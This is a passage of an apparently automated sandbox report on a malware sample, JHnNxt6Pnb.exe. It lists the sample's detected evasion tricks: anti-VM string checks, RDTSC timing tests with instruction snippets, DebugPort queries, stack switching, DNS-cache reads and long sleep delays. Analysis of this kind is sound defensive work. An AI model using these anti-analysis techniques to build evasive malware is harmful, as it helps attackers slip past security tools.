            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: JHnNxt6Pnb.exe PID: 6796, type: MEMORYSTR
            Reads the DNS cache
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00F63872 DnsGetCacheDataTableEx,DnsFree,DnsFree,9_2_00F63872
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: E39904 second address: E3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: E39B6E second address: E39B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeMemory allocated: 8B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeMemory allocated: 9B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeMemory allocated: 9D60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeMemory allocated: AD60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_00409AA0 rdtsc 4_2_00409AA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5458Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4221Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9798Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 860Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 2024Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 7945Jump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeAPI coverage: 1.7 %
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 1.9 %
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe TID: 3676Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6956Thread sleep count: 9798 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 6956Thread sleep time: -19596000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6956Thread sleep count: 143 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 6956Thread sleep time: -286000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6188Thread sleep count: 2024 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6188Thread sleep time: -4048000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6188Thread sleep count: 7945 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6188Thread sleep time: -15890000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000006.00000003.2285166751.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005157734.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
            Source: explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
            Source: explorer.exe, 00000006.00000000.1550468760.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
            Source: explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
            Source: JHnNxt6Pnb.exe, 00000000.00000002.1538691770.0000000000E95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
            Source: explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000006.00000003.2285166751.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005157734.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000006.00000000.1550468760.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_00409AA0 rdtsc 4_2_00409AA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0040ACE0 LdrLoadDll,4_2_0040ACE0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DA197 mov eax, dword ptr fs:[00000030h]4_2_019DA197
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DA197 mov eax, dword ptr fs:[00000030h]4_2_019DA197
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DA197 mov eax, dword ptr fs:[00000030h]4_2_019DA197
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9C188 mov eax, dword ptr fs:[00000030h]4_2_01A9C188
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9C188 mov eax, dword ptr fs:[00000030h]4_2_01A9C188
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A20185 mov eax, dword ptr fs:[00000030h]4_2_01A20185
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A84180 mov eax, dword ptr fs:[00000030h]4_2_01A84180
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A84180 mov eax, dword ptr fs:[00000030h]4_2_01A84180
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6019F mov eax, dword ptr fs:[00000030h]4_2_01A6019F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6019F mov eax, dword ptr fs:[00000030h]4_2_01A6019F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6019F mov eax, dword ptr fs:[00000030h]4_2_01A6019F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6019F mov eax, dword ptr fs:[00000030h]4_2_01A6019F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB61E5 mov eax, dword ptr fs:[00000030h]4_2_01AB61E5
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A101F8 mov eax, dword ptr fs:[00000030h]4_2_01A101F8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA61C3 mov eax, dword ptr fs:[00000030h]4_2_01AA61C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA61C3 mov eax, dword ptr fs:[00000030h]4_2_01AA61C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E1D0 mov eax, dword ptr fs:[00000030h]4_2_01A5E1D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E1D0 mov eax, dword ptr fs:[00000030h]4_2_01A5E1D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E1D0 mov ecx, dword ptr fs:[00000030h]4_2_01A5E1D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E1D0 mov eax, dword ptr fs:[00000030h]4_2_01A5E1D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5E1D0 mov eax, dword ptr fs:[00000030h]4_2_01A5E1D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A10124 mov eax, dword ptr fs:[00000030h]4_2_01A10124
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov eax, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov ecx, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov eax, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov eax, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov ecx, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov eax, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov eax, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov ecx, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov eax, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E10E mov ecx, dword ptr fs:[00000030h]4_2_01A8E10E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8A118 mov ecx, dword ptr fs:[00000030h]4_2_01A8A118
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8A118 mov eax, dword ptr fs:[00000030h]4_2_01A8A118
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8A118 mov eax, dword ptr fs:[00000030h]4_2_01A8A118
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8A118 mov eax, dword ptr fs:[00000030h]4_2_01A8A118
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA0115 mov eax, dword ptr fs:[00000030h]4_2_01AA0115
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6154 mov eax, dword ptr fs:[00000030h]4_2_019E6154
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6154 mov eax, dword ptr fs:[00000030h]4_2_019E6154
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DC156 mov eax, dword ptr fs:[00000030h]4_2_019DC156
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A74144 mov eax, dword ptr fs:[00000030h]4_2_01A74144
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A74144 mov eax, dword ptr fs:[00000030h]4_2_01A74144
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A74144 mov ecx, dword ptr fs:[00000030h]4_2_01A74144
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A74144 mov eax, dword ptr fs:[00000030h]4_2_01A74144
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A74144 mov eax, dword ptr fs:[00000030h]4_2_01A74144
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A78158 mov eax, dword ptr fs:[00000030h]4_2_01A78158
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A780A8 mov eax, dword ptr fs:[00000030h]4_2_01A780A8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA60B8 mov eax, dword ptr fs:[00000030h]4_2_01AA60B8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA60B8 mov ecx, dword ptr fs:[00000030h]4_2_01AA60B8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E208A mov eax, dword ptr fs:[00000030h]4_2_019E208A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A660E0 mov eax, dword ptr fs:[00000030h]4_2_01A660E0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A220F0 mov ecx, dword ptr fs:[00000030h]4_2_01A220F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DC0F0 mov eax, dword ptr fs:[00000030h]4_2_019DC0F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E80E9 mov eax, dword ptr fs:[00000030h]4_2_019E80E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A620DE mov eax, dword ptr fs:[00000030h]4_2_01A620DE
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DA0E3 mov ecx, dword ptr fs:[00000030h]4_2_019DA0E3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE016 mov eax, dword ptr fs:[00000030h]4_2_019FE016
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE016 mov eax, dword ptr fs:[00000030h]4_2_019FE016
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE016 mov eax, dword ptr fs:[00000030h]4_2_019FE016
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE016 mov eax, dword ptr fs:[00000030h]4_2_019FE016
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A76030 mov eax, dword ptr fs:[00000030h]4_2_01A76030
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A64000 mov ecx, dword ptr fs:[00000030h]4_2_01A64000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A82000 mov eax, dword ptr fs:[00000030h]4_2_01A82000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A82000 mov eax, dword ptr fs:[00000030h]4_2_01A82000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A82000 mov eax, dword ptr fs:[00000030h]4_2_01A82000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A82000 mov eax, dword ptr fs:[00000030h]4_2_01A82000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A82000 mov eax, dword ptr fs:[00000030h]4_2_01A82000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A82000 mov eax, dword ptr fs:[00000030h]4_2_01A82000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A82000 mov eax, dword ptr fs:[00000030h]4_2_01A82000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A82000 mov eax, dword ptr fs:[00000030h]4_2_01A82000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DA020 mov eax, dword ptr fs:[00000030h]4_2_019DA020
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DC020 mov eax, dword ptr fs:[00000030h]4_2_019DC020
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E2050 mov eax, dword ptr fs:[00000030h]4_2_019E2050
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0C073 mov eax, dword ptr fs:[00000030h]4_2_01A0C073
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66050 mov eax, dword ptr fs:[00000030h]4_2_01A66050
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D8397 mov eax, dword ptr fs:[00000030h]4_2_019D8397
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D8397 mov eax, dword ptr fs:[00000030h]4_2_019D8397
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D8397 mov eax, dword ptr fs:[00000030h]4_2_019D8397
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DE388 mov eax, dword ptr fs:[00000030h]4_2_019DE388
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DE388 mov eax, dword ptr fs:[00000030h]4_2_019DE388
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DE388 mov eax, dword ptr fs:[00000030h]4_2_019DE388
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0438F mov eax, dword ptr fs:[00000030h]4_2_01A0438F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0438F mov eax, dword ptr fs:[00000030h]4_2_01A0438F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E83C0 mov eax, dword ptr fs:[00000030h]4_2_019E83C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E83C0 mov eax, dword ptr fs:[00000030h]4_2_019E83C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E83C0 mov eax, dword ptr fs:[00000030h]4_2_019E83C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E83C0 mov eax, dword ptr fs:[00000030h]4_2_019E83C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA3C0 mov eax, dword ptr fs:[00000030h]4_2_019EA3C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA3C0 mov eax, dword ptr fs:[00000030h]4_2_019EA3C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA3C0 mov eax, dword ptr fs:[00000030h]4_2_019EA3C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA3C0 mov eax, dword ptr fs:[00000030h]4_2_019EA3C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA3C0 mov eax, dword ptr fs:[00000030h]4_2_019EA3C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA3C0 mov eax, dword ptr fs:[00000030h]4_2_019EA3C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A163FF mov eax, dword ptr fs:[00000030h]4_2_01A163FF
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9C3CD mov eax, dword ptr fs:[00000030h]4_2_01A9C3CD
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A663C0 mov eax, dword ptr fs:[00000030h]4_2_01A663C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE3F0 mov eax, dword ptr fs:[00000030h]4_2_019FE3F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE3F0 mov eax, dword ptr fs:[00000030h]4_2_019FE3F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE3F0 mov eax, dword ptr fs:[00000030h]4_2_019FE3F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E3DB mov eax, dword ptr fs:[00000030h]4_2_01A8E3DB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E3DB mov eax, dword ptr fs:[00000030h]4_2_01A8E3DB
